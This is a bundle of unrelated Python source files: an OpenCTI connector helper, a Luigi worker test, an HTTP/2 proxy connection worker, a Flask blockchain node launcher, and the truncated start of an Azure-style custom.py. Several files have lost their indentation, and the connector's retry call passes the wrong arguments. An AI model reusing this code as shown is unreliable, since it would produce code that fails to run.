opencti_connector_helper.py
|
import datetime
import threading
import pika
import logging
import json
import time
import base64
import uuid
import os
from typing import Callable, Dict, List
from pika.exceptions import UnroutableError, NackError
from pycti.api.opencti_api_client import OpenCTIApiClient
from pycti.connector.opencti_connector import OpenCTIConnector
def get_config_variable(envvar, yaml_path, config={}, isNumber=False):
if os.getenv(envvar) is not None:
result = os.getenv(envvar)
elif yaml_path is not None:
if yaml_path[0] in config and yaml_path[1] in config[yaml_path[0]]:
result = config[yaml_path[0]][yaml_path[1]]
else:
return None
else:
return None
if result == "yes" or result == "true" or result == "True":
return True
elif result == "no" or result == "false" or result == "False":
return False
elif isNumber:
return int(result)
else:
return result
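# Illustrative example (not part of the library): with the environment variable
# CONNECTOR_LOG_LEVEL=info set, the call
#     get_config_variable("CONNECTOR_LOG_LEVEL", ["connector", "log_level"], config)
# returns "info" from the environment and ignores the YAML value. With the variable
# unset it falls back to config["connector"]["log_level"], and it returns None when
# neither source defines the value. "yes"/"true"/"True" and "no"/"false"/"False" are
# coerced to booleans, and isNumber=True coerces the result to int.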
class ListenQueue(threading.Thread):
def __init__(self, helper, config, callback):
threading.Thread.__init__(self)
self.pika_connection = None
self.channel = None
self.helper = helper
self.callback = callback
self.uri = config["uri"]
self.queue_name = config["listen"]
# noinspection PyUnusedLocal
def _process_message(self, channel, method, properties, body):
json_data = json.loads(body)
thread = threading.Thread(target=self._data_handler, args=[json_data])
thread.start()
while thread.is_alive(): # Loop while the thread is processing
self.pika_connection.sleep(1.0)
logging.info(
"Message (delivery_tag="
+ str(method.delivery_tag)
+ ") processed, thread terminated"
)
channel.basic_ack(delivery_tag=method.delivery_tag)
def _data_handler(self, json_data):
job_id = json_data["job_id"] if "job_id" in json_data else None
try:
work_id = json_data["work_id"]
self.helper.current_work_id = work_id
self.helper.api.job.update_job(job_id, "progress", ["Starting process"])
messages = self.callback(json_data)
self.helper.api.job.update_job(job_id, "complete", messages)
except Exception as e:
logging.exception("Error in message processing, reporting error to API")
try:
self.helper.api.job.update_job(job_id, "error", [str(e)])
            except Exception:
                logging.error("Failed to report the processing error to the API")
def run(self):
while True:
try:
# Connect the broker
self.pika_connection = pika.BlockingConnection(
pika.URLParameters(self.uri)
)
self.channel = self.pika_connection.channel()
self.channel.basic_consume(
queue=self.queue_name, on_message_callback=self._process_message
)
self.channel.start_consuming()
except (KeyboardInterrupt, SystemExit):
self.helper.log_info("Connector stop")
exit(0)
except Exception as e:
self.helper.log_error(str(e))
time.sleep(10)
class PingAlive(threading.Thread):
def __init__(self, connector_id, api, get_state, set_state):
threading.Thread.__init__(self)
self.connector_id = connector_id
self.in_error = False
self.api = api
self.get_state = get_state
self.set_state = set_state
def ping(self):
while True:
try:
initial_state = self.get_state()
result = self.api.connector.ping(self.connector_id, initial_state)
remote_state = (
json.loads(result["connector_state"])
if len(result["connector_state"]) > 0
else None
)
if initial_state != remote_state:
self.set_state(result["connector_state"])
                    logging.info(
                        'Connector state has been remotely reset to: "%s"',
                        self.get_state(),
                    )
if self.in_error:
self.in_error = False
logging.error("API Ping back to normal")
except Exception:
self.in_error = True
logging.error("Error pinging the API")
time.sleep(40)
def run(self):
logging.info("Starting ping alive thread")
self.ping()
class OpenCTIConnectorHelper:
"""
Python API for OpenCTI connector
:param config: Dict standard config
"""
def __init__(self, config: dict):
# Load API config
self.opencti_url = get_config_variable(
"OPENCTI_URL", ["opencti", "url"], config
)
self.opencti_token = get_config_variable(
"OPENCTI_TOKEN", ["opencti", "token"], config
)
# Load connector config
self.connect_id = get_config_variable(
"CONNECTOR_ID", ["connector", "id"], config
)
self.connect_type = get_config_variable(
"CONNECTOR_TYPE", ["connector", "type"], config
)
self.connect_name = get_config_variable(
"CONNECTOR_NAME", ["connector", "name"], config
)
self.connect_confidence_level = get_config_variable(
"CONNECTOR_CONFIDENCE_LEVEL",
["connector", "confidence_level"],
config,
True,
)
self.connect_scope = get_config_variable(
"CONNECTOR_SCOPE", ["connector", "scope"], config
)
self.log_level = get_config_variable(
"CONNECTOR_LOG_LEVEL", ["connector", "log_level"], config
)
# Configure logger
numeric_level = getattr(logging, self.log_level.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError("Invalid log level: " + self.log_level)
logging.basicConfig(level=numeric_level)
# Initialize configuration
self.api = OpenCTIApiClient(
self.opencti_url, self.opencti_token, self.log_level
)
self.current_work_id = None
# Register the connector in OpenCTI
self.connector = OpenCTIConnector(
self.connect_id, self.connect_name, self.connect_type, self.connect_scope
)
connector_configuration = self.api.connector.register(self.connector)
self.connector_id = connector_configuration["id"]
self.connector_state = connector_configuration["connector_state"]
self.config = connector_configuration["config"]
# Start ping thread
self.ping = PingAlive(
self.connector.id, self.api, self.get_state, self.set_state
)
self.ping.start()
# Initialize caching
self.cache_index = {}
self.cache_added = []
def set_state(self, state) -> None:
self.connector_state = json.dumps(state)
def get_state(self):
try:
return (
None
if self.connector_state is None
else json.loads(self.connector_state)
)
except:
return None
def listen(self, message_callback: Callable[[Dict], List[str]]) -> None:
listen_queue = ListenQueue(self, self.config, message_callback)
listen_queue.start()
def get_connector(self):
return self.connector
def log_error(self, msg):
logging.error(msg)
def log_info(self, msg):
logging.info(msg)
def date_now(self):
return (
datetime.datetime.utcnow()
.replace(microsecond=0, tzinfo=datetime.timezone.utc)
.isoformat()
)
# Push Stix2 helper
def send_stix2_bundle(self, bundle, entities_types=None, update=False, split=True):
if entities_types is None:
entities_types = []
if split:
bundles = self.split_stix2_bundle(bundle)
if len(bundles) == 0:
raise ValueError("Nothing to import")
pika_connection = pika.BlockingConnection(
pika.URLParameters(self.config["uri"])
)
channel = pika_connection.channel()
for bundle in bundles:
self._send_bundle(channel, bundle, entities_types, update)
channel.close()
return bundles
else:
pika_connection = pika.BlockingConnection(
pika.URLParameters(self.config["uri"])
)
channel = pika_connection.channel()
self._send_bundle(channel, bundle, entities_types, update)
channel.close()
return [bundle]
def _send_bundle(self, channel, bundle, entities_types=None, update=False):
"""
This method send a STIX2 bundle to RabbitMQ to be consumed by workers
:param bundle: A valid STIX2 bundle
:param entities_types: Entities types to ingest
"""
if entities_types is None:
entities_types = []
# Create a job log expectation
if self.current_work_id is not None:
job_id = self.api.job.initiate_job(self.current_work_id)
else:
job_id = None
# Validate the STIX 2 bundle
# validation = validate_string(bundle)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON')
# Prepare the message
# if self.current_work_id is None:
# raise ValueError('The job id must be specified')
message = {
"job_id": job_id,
"entities_types": entities_types,
"update": update,
"content": base64.b64encode(bundle.encode("utf-8")).decode("utf-8"),
}
# Send the message
try:
routing_key = "push_routing_" + self.connector_id
channel.basic_publish(
self.config["push_exchange"], routing_key, json.dumps(message)
)
logging.info("Bundle has been sent")
except (UnroutableError, NackError) as e:
logging.error("Unable to send bundle, retry...", e)
self._send_bundle(bundle, entities_types)
def split_stix2_bundle(self, bundle):
self.cache_index = {}
self.cache_added = []
try:
bundle_data = json.loads(bundle)
except:
raise Exception("File data is not a valid JSON")
# validation = validate_parsed_json(bundle_data)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON:' + bundle)
# Index all objects by id
for item in bundle_data["objects"]:
self.cache_index[item["id"]] = item
bundles = []
# Reports must be handled because of object_refs
for item in bundle_data["objects"]:
if item["type"] == "report":
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_report_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Relationships not added in previous reports
for item in bundle_data["objects"]:
if item["type"] == "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_relationship_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Entities not added in previous reports and relationships
for item in bundle_data["objects"]:
if item["type"] != "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_entity_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
return bundles
def stix2_get_embedded_objects(self, item):
# Marking definitions
object_marking_refs = []
if "object_marking_refs" in item:
for object_marking_ref in item["object_marking_refs"]:
if object_marking_ref in self.cache_index:
object_marking_refs.append(self.cache_index[object_marking_ref])
# Created by ref
created_by_ref = None
if "created_by_ref" in item and item["created_by_ref"] in self.cache_index:
created_by_ref = self.cache_index[item["created_by_ref"]]
return {
"object_marking_refs": object_marking_refs,
"created_by_ref": created_by_ref,
}
def stix2_get_entity_objects(self, entity):
items = [entity]
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(entity)
# Add created by ref
if embedded_objects["created_by_ref"] is not None:
items.append(embedded_objects["created_by_ref"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_relationship_objects(self, relationship):
items = [relationship]
# Get source ref
if relationship["source_ref"] in self.cache_index:
items.append(self.cache_index[relationship["source_ref"]])
# Get target ref
if relationship["target_ref"] in self.cache_index:
items.append(self.cache_index[relationship["target_ref"]])
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(relationship)
# Add created by ref
if embedded_objects["created_by_ref"] is not None:
items.append(embedded_objects["created_by_ref"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_report_objects(self, report):
items = [report]
# Add all object refs
for object_ref in report["object_refs"]:
items.append(self.cache_index[object_ref])
for item in items:
if item["type"] == "relationship":
items = items + self.stix2_get_relationship_objects(item)
else:
items = items + self.stix2_get_entity_objects(item)
return items
@staticmethod
def stix2_deduplicate_objects(items):
ids = []
final_items = []
for item in items:
if item["id"] not in ids:
final_items.append(item)
ids.append(item["id"])
return final_items
@staticmethod
def stix2_create_bundle(items):
bundle = {
"type": "bundle",
"id": "bundle--" + str(uuid.uuid4()),
"spec_version": "2.0",
"objects": items,
}
return json.dumps(bundle)
@staticmethod
def check_max_tlp(tlp, max_tlp):
allowed_tlps = ["TLP:WHITE"]
if max_tlp == "TLP:RED":
allowed_tlps = ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER", "TLP:RED"]
elif max_tlp == "TLP:AMBER":
allowed_tlps = ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER"]
elif max_tlp == "TLP:GREEN":
allowed_tlps = ["TLP:WHITE", "TLP:GREEN"]
return tlp in allowed_tlps
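# Minimal usage sketch (illustrative only, not part of this module): a connector
# typically builds a config dict with the keys read by get_config_variable above,
# instantiates the helper and registers a callback with listen(). The URL, token
# and connector values below are placeholders, not real credentials.
if __name__ == "__main__":
    example_config = {
        "opencti": {"url": "http://localhost:8080", "token": "ChangeMe"},
        "connector": {
            "id": "11111111-1111-1111-1111-111111111111",
            "type": "EXTERNAL_IMPORT",
            "name": "Example connector",
            "scope": "stix2",
            "confidence_level": 3,
            "log_level": "info",
        },
    }
    helper = OpenCTIConnectorHelper(example_config)
    def process_message(data):
        # ListenQueue expects a list of status messages for the job.
        helper.log_info("Received message: " + json.dumps(data))
        return ["Nothing to import"]
    helper.listen(process_message)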
|
worker_keep_alive_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2016 VNG Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from helpers import LuigiTestCase
from luigi.scheduler import Scheduler
from luigi.worker import Worker
import luigi
import threading
class WorkerKeepAliveUpstreamTest(LuigiTestCase):
"""
Tests related to how the worker stays alive after upstream status changes.
See https://github.com/spotify/luigi/pull/1789
"""
def run(self, result=None):
"""
        Common setup code. Because of the context manager we can't use the normal setUp.
"""
self.sch = Scheduler(retry_delay=0.00000001, retry_count=2)
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0) as w:
self.w = w
super(WorkerKeepAliveUpstreamTest, self).run(result)
def test_alive_while_has_failure(self):
"""
One dependency disables and one fails
"""
class Disabler(luigi.Task):
pass
class Failer(luigi.Task):
did_run = False
def run(self):
self.did_run = True
class Wrapper(luigi.WrapperTask):
def requires(self):
return (Disabler(), Failer())
self.w.add(Wrapper())
disabler = Disabler().task_id
failer = Failer().task_id
self.sch.add_task(disabler, 'FAILED', worker='X')
self.sch.prune() # Make scheduler unfail the disabled task
self.sch.add_task(disabler, 'FAILED', worker='X') # Disable it
self.sch.add_task(failer, 'FAILED', worker='X') # Fail it
try:
t = threading.Thread(target=self.w.run)
t.start()
t.join(timeout=1) # Wait 1 second
self.assertTrue(t.is_alive()) # It shouldn't stop trying, the failed task should be retried!
self.assertFalse(Failer.did_run) # It should never have run, the cooldown is longer than a second.
finally:
self.sch.prune() # Make it, like die. Couldn't find a more forceful way to do this.
t.join(timeout=1) # Wait 1 second
assert not t.is_alive()
def test_alive_while_has_success(self):
"""
One dependency disables and one succeeds
"""
# TODO: Fix copy paste mess
class Disabler(luigi.Task):
pass
class Succeeder(luigi.Task):
did_run = False
def run(self):
self.did_run = True
class Wrapper(luigi.WrapperTask):
def requires(self):
return (Disabler(), Succeeder())
self.w.add(Wrapper())
disabler = Disabler().task_id
succeeder = Succeeder().task_id
self.sch.add_task(disabler, 'FAILED', worker='X')
self.sch.prune() # Make scheduler unfail the disabled task
self.sch.add_task(disabler, 'FAILED', worker='X') # Disable it
        self.sch.add_task(succeeder, 'DONE', worker='X')  # Mark it as done
try:
t = threading.Thread(target=self.w.run)
t.start()
t.join(timeout=1) # Wait 1 second
self.assertFalse(t.is_alive()) # The worker should think that it should stop ...
# ... because in this case the only work remaining depends on DISABLED tasks,
# hence it's not worth considering the wrapper task as a PENDING task to
# keep the worker alive anymore.
            self.assertFalse(Succeeder.did_run)  # It should never have run, it succeeded already
finally:
            self.sch.prune()  # This shouldn't be necessary in this version, but whatevs
t.join(timeout=1) # Wait 1 second
assert not t.is_alive()
|
http2_connection.py
|
import Queue
import threading
import socket
import errno
import struct
import time
from xlog import getLogger
xlog = getLogger("gae_proxy")
import connect_control
from http_common import *
from hyper.common.bufsocket import BufferedSocket
from hyper.packages.hyperframe.frame import (
FRAMES, DataFrame, HeadersFrame, PushPromiseFrame, RstStreamFrame,
SettingsFrame, Frame, WindowUpdateFrame, GoAwayFrame, PingFrame,
BlockedFrame, FRAME_MAX_ALLOWED_LEN, FRAME_MAX_LEN
)
from hyper.packages.hpack.hpack_compat import Encoder, Decoder
from http2_stream import Stream
from hyper.http20.window import BaseFlowControlManager
# this is defined in rfc7540
# default window size 64k
DEFAULT_WINDOW_SIZE = 65535
# default max frame is 16k, defined in rfc7540
DEFAULT_MAX_FRAME = FRAME_MAX_LEN
class FlowControlManager(BaseFlowControlManager):
"""
``hyper``'s default flow control manager.
This implements hyper's flow control algorithms. This algorithm attempts to
reduce the number of WINDOWUPDATE frames we send without blocking the remote
endpoint behind the flow control window.
This algorithm will become more complicated over time. In the current form,
the algorithm is very simple:
- When the flow control window gets less than 3/4 of the maximum size,
increment back to the maximum.
- Otherwise, if the flow control window gets to less than 1kB, increment
back to the maximum.
"""
def increase_window_size(self, frame_size):
future_window_size = self.window_size - frame_size
if ((future_window_size < (self.initial_window_size * 3 / 4)) or
(future_window_size < 1000)):
return self.initial_window_size - future_window_size
return 0
def blocked(self):
return self.initial_window_size - self.window_size
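# Worked example (illustrative): with initial_window_size = 65535 and
# window_size = 60000, a 20000-byte frame leaves a future window of 40000 bytes.
# That is below 3/4 of 65535 (about 49151), so increase_window_size() returns
# 65535 - 40000 = 25535, topping the window back up to the maximum.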
class HTTP2_worker(HTTP_worker):
version = "2"
def __init__(self, ssl_sock, close_cb, retry_task_cb):
super(HTTP2_worker, self).__init__(ssl_sock, close_cb, retry_task_cb)
self.max_concurrent = 20
self.network_buffer_size = 128 * 1024
        # Google's HTTP/2 timeout is 4 minutes.
ssl_sock.settimeout(240)
self._sock = BufferedSocket(ssl_sock, self.network_buffer_size)
self.next_stream_id = 1
self.streams = {}
self.last_ping_time = time.time()
        # Count of pings not yet ACKed:
        # increased when a ping is sent,
        # decreased when a ping ack is received.
        # If this is not 0, don't accept requests.
self.ping_on_way = 0
# request_lock
self.request_lock = threading.Lock()
        # All frames to send must be put on this queue and are then sent by send_loop.
        # Every frame put on this queue must already be allowed by the stream window
        # and the connection window; any data frame blocked by the connection window
        # should go to self.blocked_send_frames instead.
self.send_queue = Queue.Queue()
        # Buffer for blocked data frames that are allowed by the stream window
        # but blocked by the connection window.
        # They will be sent when the connection window opens.
self.blocked_send_frames = []
self.encoder = Encoder()
self.decoder = Decoder()
# Values for the settings used on an HTTP/2 connection.
        # They will be sent to the remote end in a SETTINGS frame.
self.local_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: 1 * 1024 * 1024,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: 256 * 1024
}
self.local_connection_initial_windows = 2 * 1024 * 1024
self.local_window_manager = FlowControlManager(self.local_connection_initial_windows)
        # Changed by the server via SETTINGS frames.
self.remote_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: DEFAULT_WINDOW_SIZE,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: DEFAULT_MAX_FRAME,
SettingsFrame.MAX_CONCURRENT_STREAMS: 100
}
self.remote_window_size = DEFAULT_WINDOW_SIZE
        # Send the SETTINGS frame before accepting tasks.
self._send_preamble()
threading.Thread(target=self.send_loop).start()
threading.Thread(target=self.recv_loop).start()
def request(self, task):
        # This is the exported API.
if len(self.streams) > self.max_concurrent:
self.accept_task = False
task.set_state("h2_req")
self.request_task(task)
def request_task(self, task):
with self.request_lock:
# create stream to process task
stream_id = self.next_stream_id
            # HTTP/2 clients use odd stream ids.
self.next_stream_id += 2
stream = Stream(self, self.ip, stream_id, self.ssl_sock.host, task,
self._send_cb, self._close_stream_cb, self.encoder, self.decoder,
FlowControlManager(self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]),
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE],
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE])
self.streams[stream_id] = stream
def send_loop(self):
while connect_control.keep_running and self.keep_running:
frame = self.send_queue.get(True)
if not frame:
                # A None frame is the signal to exit.
break
# xlog.debug("%s Send:%s", self.ip, str(frame))
data = frame.serialize()
try:
self._sock.send(data, flush=False)
                # Don't flush for small packets, to reduce send() calls;
                # wait briefly for the payload frame so that header and
                # payload can be combined into one TCP packet.
                time.sleep(0.001)
if not self.send_queue._qsize():
self._sock.flush()
except socket.error as e:
if e.errno not in (errno.EPIPE, errno.ECONNRESET):
xlog.warn("%s http2 send fail:%r", self.ip, e)
else:
                    xlog.exception("send error:%r", e)
                self.close("send fail:%r" % e)
def recv_loop(self):
while connect_control.keep_running and self.keep_running:
try:
self._consume_single_frame()
except Exception as e:
xlog.debug("recv fail:%r", e)
self.close("recv fail:%r" % e)
def get_rtt_rate(self):
return self.rtt + len(self.streams) * 100
def close(self, reason=""):
self.keep_running = False
# Notify loop to exit
        # This function may be called from outside the http2 module,
        # e.g. when gae_proxy finds that the appid or ip is wrong.
self.send_queue.put(None)
for stream in self.streams.values():
if stream.get_head_time:
                # The header has been received and the response has
                # already been sent to the client, so we can't retry.
stream.close(reason=reason)
else:
self.retry_task_cb(stream.task)
super(HTTP2_worker, self).close(reason)
def send_ping(self):
p = PingFrame(0)
p.opaque_data = struct.pack("!d", time.time())
self.send_queue.put(p)
self.last_ping_time = time.time()
self.ping_on_way += 1
def _send_preamble(self):
self._sock.send(b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n')
f = SettingsFrame(0)
f.settings[SettingsFrame.ENABLE_PUSH] = 0
f.settings[SettingsFrame.INITIAL_WINDOW_SIZE] = self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
f.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = self.local_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
self._send_cb(f)
        # Update the local connection window size.
f = WindowUpdateFrame(0)
f.window_increment = self.local_connection_initial_windows - DEFAULT_WINDOW_SIZE
self._send_cb(f)
def increase_remote_window_size(self, inc_size):
        # Check and send blocked frames if the connection window allows.
self.remote_window_size += inc_size
#xlog.debug("%s increase send win:%d result:%d", self.ip, inc_size, self.remote_window_size)
while len(self.blocked_send_frames):
frame = self.blocked_send_frames[0]
if len(frame.data) > self.remote_window_size:
return
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
self.blocked_send_frames.pop(0)
def _send_cb(self, frame):
        # Can be called by a stream.
        # Put the frame in blocked_send_frames if the connection window doesn't allow it.
if frame.type == DataFrame.type:
if len(frame.data) > self.remote_window_size:
self.blocked_send_frames.append(frame)
self.accept_task = False
return
else:
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
else:
self.send_queue.put(frame)
def _close_stream_cb(self, stream_id, reason):
        # Called by a stream to remove itself from the streams list.
#xlog.debug("%s close stream:%d %s", self.ssl_sock.ip, stream_id, reason)
try:
del self.streams[stream_id]
except KeyError:
pass
if self.keep_running and len(self.streams) < self.max_concurrent and self.remote_window_size > 10000:
self.accept_task = True
self.processed_tasks += 1
def _consume_single_frame(self):
try:
header = self._sock.recv(9)
except Exception as e:
xlog.warn("%s _consume_single_frame:%r", self.ip, e)
self.close("disconnect:%r" % e)
return
# Parse the header. We can use the returned memoryview directly here.
frame, length = Frame.parse_frame_header(header)
if length > FRAME_MAX_LEN:
xlog.error("Frame size exceeded on stream %d (received: %d, max: %d)",
frame.stream_id, length, FRAME_MAX_LEN)
# self._send_rst_frame(frame.stream_id, 6) # 6 = FRAME_SIZE_ERROR
data = self._recv_payload(length)
self._consume_frame_payload(frame, data)
def _recv_payload(self, length):
if not length:
return memoryview(b'')
buffer = bytearray(length)
buffer_view = memoryview(buffer)
index = 0
data_length = -1
# _sock.recv(length) might not read out all data if the given length
        # is very large, so we should read from the socket repeatedly.
while length and data_length:
data = self._sock.recv(length)
data_length = len(data)
end = index + data_length
buffer_view[index:end] = data[:]
length -= data_length
index = end
return buffer_view[:end]
def _consume_frame_payload(self, frame, data):
frame.parse_body(data)
# xlog.debug("%s Recv:%s", self.ip, str(frame))
# Maintain our flow control window. We do this by delegating to the
# chosen WindowManager.
if frame.type == DataFrame.type:
size = frame.flow_controlled_length
increment = self.local_window_manager._handle_frame(size)
if increment:
#xlog.debug("%s frame size:%d increase win:%d", self.ip, size, increment)
w = WindowUpdateFrame(0)
w.window_increment = increment
self._send_cb(w)
elif frame.type == PushPromiseFrame.type:
xlog.error("%s receive push frame", self.ip,)
# Work out to whom this frame should go.
if frame.stream_id != 0:
try:
self.streams[frame.stream_id].receive_frame(frame)
except KeyError:
xlog.error("%s Unexpected stream identifier %d", self.ip, frame.stream_id)
else:
self.receive_frame(frame)
def receive_frame(self, frame):
if frame.type == WindowUpdateFrame.type:
self.increase_remote_window_size(frame.window_increment)
elif frame.type == PingFrame.type:
if 'ACK' in frame.flags:
ping_time = struct.unpack("!d", frame.opaque_data)[0]
time_now = time.time()
rtt = (time_now - ping_time) * 1000
if rtt < 0:
xlog.error("rtt:%f ping_time:%f now:%f", rtt, ping_time, time_now)
self.rtt = rtt
self.ping_on_way -= 1
#xlog.debug("RTT:%d, on_way:%d", self.rtt, self.ping_on_way)
if self.keep_running and self.ping_on_way == 0:
self.accept_task = True
else:
# The spec requires us to reply with PING+ACK and identical data.
p = PingFrame(0)
p.flags.add('ACK')
p.opaque_data = frame.opaque_data
self._send_cb(p)
elif frame.type == SettingsFrame.type:
if 'ACK' not in frame.flags:
# send ACK as soon as possible
f = SettingsFrame(0)
f.flags.add('ACK')
self._send_cb(f)
                # This may trigger sending DataFrames blocked by the remote window.
self._update_settings(frame)
elif frame.type == GoAwayFrame.type:
# If we get GoAway with error code zero, we are doing a graceful
# shutdown and all is well. Otherwise, throw an exception.
            # If an error occurred, try to read the error description from
# code registry otherwise use the frame's additional data.
error_string = frame._extra_info()
if frame.additional_data != "session_timed_out":
xlog.warn("goaway:%s", error_string)
self.close("GoAway:%s" % error_string)
elif frame.type == BlockedFrame.type:
xlog.warn("%s get BlockedFrame", self.ip)
elif frame.type in FRAMES:
# This frame isn't valid at this point.
#raise ValueError("Unexpected frame %s." % frame)
xlog.error("%s Unexpected frame %s.", self.ip, frame)
else: # pragma: no cover
# Unexpected frames belong to extensions. Just drop it on the
# floor, but log so that users know that something happened.
xlog.error("%s Received unknown frame, type %d", self.ip, frame.type)
def _update_settings(self, frame):
if SettingsFrame.HEADER_TABLE_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.HEADER_TABLE_SIZE]
self.remote_settings[SettingsFrame.HEADER_TABLE_SIZE] = new_size
self.encoder.header_table_size = new_size
if SettingsFrame.INITIAL_WINDOW_SIZE in frame.settings:
newsize = frame.settings[SettingsFrame.INITIAL_WINDOW_SIZE]
oldsize = self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
delta = newsize - oldsize
for stream in self.streams.values():
stream.remote_window_size += delta
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE] = newsize
if SettingsFrame.SETTINGS_MAX_FRAME_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
if not (FRAME_MAX_LEN <= new_size <= FRAME_MAX_ALLOWED_LEN):
xlog.error("%s Frame size %d is outside of allowed range", self.ip, new_size)
# Tear the connection down with error code PROTOCOL_ERROR
self.close("bad max frame size")
#error_string = ("Advertised frame size %d is outside of range" % (new_size))
#raise ConnectionError(error_string)
return
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = new_size
for stream in self.streams.values():
                stream.max_frame_size = new_size
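# Usage sketch (illustrative; ssl_sock, task and the callbacks are hypothetical
# objects supplied by the caller): the connection owner constructs the worker with
# an established TLS socket and two callbacks, then submits tasks, each of which
# is mapped onto its own HTTP/2 stream.
#   worker = HTTP2_worker(ssl_sock, close_cb, retry_task_cb)
#   worker.request(task)      # dispatched on the next odd stream id
#   worker.send_ping()        # measures RTT; the PING ACK updates worker.rtt
#   worker.close("shutdown")  # stops the send/recv loops and retries pending tasks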
|
rest.py
|
import time
import socket
import requests
import threading
import config
import endpoints
import block
from flask_cors import CORS
from argparse import ArgumentParser
from flask import Flask, jsonify, request, render_template
from block import Block
from transaction import Transaction
from endpoints import node, rest_api
# All nodes are aware of the ip and the port of the bootstrap
# node, in order to communicate with it when entering the network.
BOOTSTRAP_IP = config.BOOTSTRAP_IP
BOOTSTRAP_PORT = config.BOOTSTRAP_PORT
# Get the IP address of the device.
if config.LOCAL:
IPAddr = BOOTSTRAP_IP
else:
hostname = socket.gethostname()
IPAddr = socket.gethostbyname(hostname)
# Define the flask environment and register the blueprint with the endpoints.
app = Flask(__name__)
app.register_blueprint(rest_api)
CORS(app)
if __name__ == '__main__':
# Define the argument parser.
parser = ArgumentParser(description='Rest api of noobcash.')
required = parser.add_argument_group('required arguments')
    optional = parser.add_argument_group('optional arguments')
required.add_argument(
'-p', type=int, help='port to listen on', required=True)
required.add_argument(
'-n', type=int, help='number of nodes in the blockchain', required=True)
required.add_argument('-capacity', type=int,
help='capacity of a block', required=True)
optional.add_argument('-bootstrap', action='store_true',
help='set if the current node is the bootstrap')
# Parse the given arguments.
args = parser.parse_args()
port = args.p
endpoints.n = args.n
node.capacity = args.capacity
is_bootstrap = args.bootstrap
    if is_bootstrap:
"""
The bootstrap node (id = 0):
- registers itself in the ring.
- creates the genesis block.
- creates the first transaction and adds it in the genesis block.
- adds the genesis block in the blockchain (no validation).
- starts listening in the desired port.
"""
node.id = 0
node.register_node_to_ring(
node.id, BOOTSTRAP_IP, BOOTSTRAP_PORT, node.wallet.public_key, 100 * endpoints.n)
# Defines the genesis block.
gen_block = node.create_new_block()
gen_block.nonce = 0
# Adds the first and only transaction in the genesis block.
first_transaction = Transaction(
sender_address="0", sender_id='0', receiver_address=node.wallet.public_key, receiver_id=node.id, amount=100 * endpoints.n, transaction_inputs=None, nbc_sent=100 * endpoints.n)
gen_block.transactions.append(first_transaction)
gen_block.current_hash = gen_block.get_hash()
node.wallet.transactions.append(first_transaction)
# Add the genesis block in the chain.
node.chain.blocks.append(gen_block)
node.current_block = None
        # Listen on the specified address (ip:port).
app.run(host=BOOTSTRAP_IP, port=BOOTSTRAP_PORT)
else:
"""
The rest nodes (id = 1, .., n-1):
- communicate with the bootstrap node in order to register them.
- starts listening in the desired port.
"""
register_address = 'http://' + BOOTSTRAP_IP + \
':' + BOOTSTRAP_PORT + '/register_node'
def thread_function():
time.sleep(2)
response = requests.post(
register_address,
data={'public_key': node.wallet.public_key,
'ip': IPAddr, 'port': port}
)
if response.status_code == 200:
print("Node initialized")
node.id = response.json()['id']
req = threading.Thread(target=thread_function, args=())
req.start()
        # Listen on the specified address (ip:port).
app.run(host=IPAddr, port=port)
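# Example invocation (illustrative): start the bootstrap node of a 5-node network
# with a block capacity of 10 transactions:
#   python rest.py -p 5000 -n 5 -capacity 10 -bootstrap
# The remaining nodes omit -bootstrap and register themselves through the
# /register_node endpoint shortly after start-up.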
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
